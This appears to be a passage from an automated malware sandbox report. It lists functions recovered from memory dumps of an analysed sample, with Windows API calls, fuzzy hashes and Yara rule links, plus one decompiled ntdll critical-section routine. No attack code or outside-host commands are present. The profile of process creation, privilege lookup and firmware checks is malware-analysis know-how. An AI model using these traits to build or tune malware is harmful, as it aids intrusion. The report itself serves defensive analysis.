                                                • Opcode Fuzzy Hash: d805ba1e46ef74495d7e40f55282b07c402c5ca3b5094a973425aca124e70bdd
                                                • Instruction Fuzzy Hash: 0201DD31A80269BAE721A6549C47FFE772C6B41F51F05401DFF04BA1C1D698690547E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007C82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007C834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007C836B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                • Instruction ID: f7caa1d4ec8343ff5abf96f7330a621096ec24b3d5907be95aeb7c93317c14a1
                                                • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                • Instruction Fuzzy Hash: D901F731A8022CBBE721A6949C47FBE772C6B00F51F05001DFF04BA1C1E6D8690642F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007C82B4, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007C834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007C836B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 806593ff2b28a98b5f6f960ce9fda001b8095b9029fb77e68690ce7ab28167fe
                                                • Instruction ID: 5390e87db526c91c290c1e8c02c0a9c3903bfdf9f511958b8e1bcd3dfdbddf25
                                                • Opcode Fuzzy Hash: 806593ff2b28a98b5f6f960ce9fda001b8095b9029fb77e68690ce7ab28167fe
                                                • Instruction Fuzzy Hash: D701FE72940158B7DA20AA945C47FFE236C7B40F11F06015EFF04AB2C1EADD690546E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007CF470, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 007CF4C9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: EnvironmentFirmwareVariable
                                                • String ID:
                                                • API String ID: 3150624800-0
                                                • Opcode ID: 5d619678d9737fcd07d513645d2e64ebd5b16128d12cebff36f80aaa30dd0fef
                                                • Instruction ID: 889c4697e13777bb9ed38234e264a728913186bcd6c5a0c3ab547fecff6f08a9
                                                • Opcode Fuzzy Hash: 5d619678d9737fcd07d513645d2e64ebd5b16128d12cebff36f80aaa30dd0fef
                                                • Instruction Fuzzy Hash: B611A7B57002087BE724CE69DC82FAB776DDBC5710F204069FE04EB281E575AD50C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007CF511, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 007CF4C9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: EnvironmentFirmwareVariable
                                                • String ID:
                                                • API String ID: 3150624800-0
                                                • Opcode ID: 7f9b4dabe450f68b1474a547e9336fefcd03f1c796f7f7f21f38a1879df4290d
                                                • Instruction ID: 2e5b5d7d57e9c9e2d3a55135915704fe0423dc907a48c71c7f74e9c07aa8b4c9
                                                • Opcode Fuzzy Hash: 7f9b4dabe450f68b1474a547e9336fefcd03f1c796f7f7f21f38a1879df4290d
                                                • Instruction Fuzzy Hash: 66F0596674020521E328896A7C43FB3F319D7C4B15F10807FFB08D6083F81665514194
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007DA0DD, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007DA134
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: a08032073799318443623ae3f431379b61d8d566bc5e0460e856ed145056896e
                                                • Instruction ID: 53757b5a127a0ecb7619dd9175c3bbd2d86ecc7a04a607661395608761ea7bbe
                                                • Opcode Fuzzy Hash: a08032073799318443623ae3f431379b61d8d566bc5e0460e856ed145056896e
                                                • Instruction Fuzzy Hash: C801AFB2210108BBCB54DF89DC85EEB77ADAF8C754F158258FA4DA7241C630E851CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007DA0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007DA134
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 376645f45a90fced63f48ab4fa37ee2cb77eecf280e1abf1e200dd8985ad0dbf
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: D101AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007DA1C1, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,007CF1A2,007CF1A2,?,00000000,?,?), ref: 007DA200
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 57feec71a1fb8b7225c7baf1dbde007b2319946838952b7b17768df68d6c12bb
                                                • Instruction ID: 5d44cc15443b2231f6836f99213bf88f5c4245de95246f56c8abad200f05fa92
                                                • Opcode Fuzzy Hash: 57feec71a1fb8b7225c7baf1dbde007b2319946838952b7b17768df68d6c12bb
                                                • Instruction Fuzzy Hash: A901DCB1604208BBEB14DF94DC88DE777A8EF88210F048199FD0C8B642CA34A8148BB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007DA030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(007D4506,?,007D4C7F,007D4C7F,?,007D4506,?,?,?,?,?,00000000,00000000,?), ref: 007DA05D
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: c4f18a94675278ab24e7fb49d7415ebac5667c771bf224a933597737c642fcb4
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: 4BE012B1200208ABDB14EF99CC85EA777ACEF88650F158559BA086B242C630F9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007DA1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,007CF1A2,007CF1A2,?,00000000,?,?), ref: 007DA200
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: f4b2cbb8a34644a57bafec88f98043fdb4dbf8c19256e3318126d5efa592a03b
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 5DE01AB1200208ABDB10DF49CC85EE737ADEF89650F018155BA0867241C934F8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007CF697, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,007C8CF4,?), ref: 007CF6CB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 6871598d5e345b460535cde8d49a0ebe1612cd98dae4b6078105a511d7e7b283
                                                • Instruction ID: 350285d65295875ce07a9937b714807bed0baae67838d1c6818047841bf3b351
                                                • Opcode Fuzzy Hash: 6871598d5e345b460535cde8d49a0ebe1612cd98dae4b6078105a511d7e7b283
                                                • Instruction Fuzzy Hash: B6E0C2252983053AE710ABB4DC17F2377996B05714F4900ACFA889A3C3D994D0008262
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007CF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,007C8CF4,?), ref: 007CF6CB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                • Instruction ID: e73ea49827353b9edc866f8faff3b95f5296002cc5f6243ebbd26728b7a3fdb9
                                                • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                • Instruction Fuzzy Hash: 20D0A7717903043BE610FEA4DC07F2633CD6B44B00F490078FA48E73C3D964E4004165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D4967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34b3f4b543aabe683cf697c05f51c67298d791ead2c1b6e3534cba8e176b3a9c
                                                • Instruction ID: 5dca91d77a543308ac1bf4a577ff8edc305f5515e7528dbb4a69d2b1bae381ff
                                                • Opcode Fuzzy Hash: 34b3f4b543aabe683cf697c05f51c67298d791ead2c1b6e3534cba8e176b3a9c
                                                • Instruction Fuzzy Hash: 02B09BB19424C5CBFB51D77146087277911B7D4745F16C055D1420651A4778D0D1F5B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 04D9FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E04D9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04D4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04D95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04D95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                0x04d9fdda
                                                0x04d9fde2
                                                0x04d9fde5
                                                0x04d9fdec
                                                0x04d9fdfa
                                                0x04d9fdff
                                                0x04d9fe0a
                                                0x04d9fe0f
                                                0x04d9fe17
                                                0x04d9fe1e
                                                0x04d9fe19
                                                0x04d9fe19
                                                0x04d9fe19
                                                0x04d9fe20
                                                0x04d9fe21
                                                0x04d9fe22
                                                0x04d9fe25
                                                0x04d9fe40

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D9FDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D9FE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D9FE2B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 36081e09a024ea487337ea1a3efc5c5f00a86867ab1dc643ed392d382d9c9246
                                                • Instruction ID: 9d00da377708bd8d7c16b087897eb991dc09193b4945032d391796791cbde19a
                                                • Opcode Fuzzy Hash: 36081e09a024ea487337ea1a3efc5c5f00a86867ab1dc643ed392d382d9c9246
                                                • Instruction Fuzzy Hash: 88F0F632340201BFEB211A45DC06F23BB9AEB44730F150324F628961D1EA62FD2097F4
                                                Uniqueness

                                                Uniqueness Score: -1.00%